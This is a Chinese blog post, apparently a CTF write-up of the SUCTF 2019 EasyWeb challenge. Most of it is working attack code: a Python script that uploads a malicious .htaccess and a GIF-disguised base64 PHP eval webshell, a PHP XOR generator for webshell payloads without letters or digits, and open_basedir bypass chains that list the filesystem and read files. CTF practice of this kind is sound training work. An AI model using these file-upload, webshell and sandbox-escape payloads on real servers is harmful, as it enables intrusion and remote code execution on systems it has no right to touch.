[SUCTF 2019]EasyWeb

I·CE

于 2022-05-28 16:57:10 发布

阅读量265

点赞数

分类专栏：刷题文章标签： php 开发语言

本文链接：https://blog.csdn.net/qq_61142406/article/details/125020234

版权

刷题专栏收录该内容

12 篇文章 0 订阅

订阅专栏

知识点：

AddType application/x-httpd-php .ahhh//http头添加使得.ahhh当作php脚本解析

GIF89a文件头欺骗

GIF89a12		12是为了补足8个字节，满足base64编码的规则

绕过open_basedir

无数字字母webshell

python上传脚本


import requests
import base64

htaccess = b"""
#define width 1337
#define height 1337 
AddType application/x-httpd-php .ahhh
php_value auto_append_file "php://filter/convert.base64-decode/resource=./shell.ahhh"
"""
shell = b"GIF89a12" + base64.b64encode(b"<?php eval($_REQUEST['cmd']);?>")
url = "http://1c512d61-43b5-41ae-9f74-4228d9af8caf.node4.buuoj.cn:81/?_=${%86%86%86%86^%d9%c1%c3%d2}{%86}();&%86=get_the_flag"

files = {'file':('.htaccess',htaccess,'image/jpeg')}
data = {"upload":"Submit"}
response = requests.post(url=url, data=data, files=files)
print(response.text)

files = {'file':('shell.ahhh',shell,'image/jpeg')}
response = requests.post(url=url, data=data, files=files)
print(response.text)

异或脚本：

function finds($string)
{
    $index = 0;
    $a = [33, 35, 36, 37, 40, 41, 42, 43, 45, 47, 58, 59, 60, 62, 63, 64, 92, 93, 94, 123, 125, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255];
    for ($i = 27; $i < count($a); $i++) {
        for ($j = 27; $j < count($a); $j++) {
            $x = $a[$i] ^ $a[$j];
            for ($k = 0; $k < strlen($string); $k++) {
                if (ord($string[$k]) == $x) {
                    echo $string[$k] ;
                    echo '<br/>';
                    echo '%' . dechex($a[$i]) . '^%' . dechex($a[$j]) ;
                    echo '<br/>';
                    $index++;
                    if ($index == strlen($string)) {
                        return 0;
                    }
                }
            }
        }
    }
}
finds("phpinfo");

bypass open_basedir

chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');

chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(scandir("/"));
chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');echo(file_get_contents('/THis_Is_tHe_F14g'));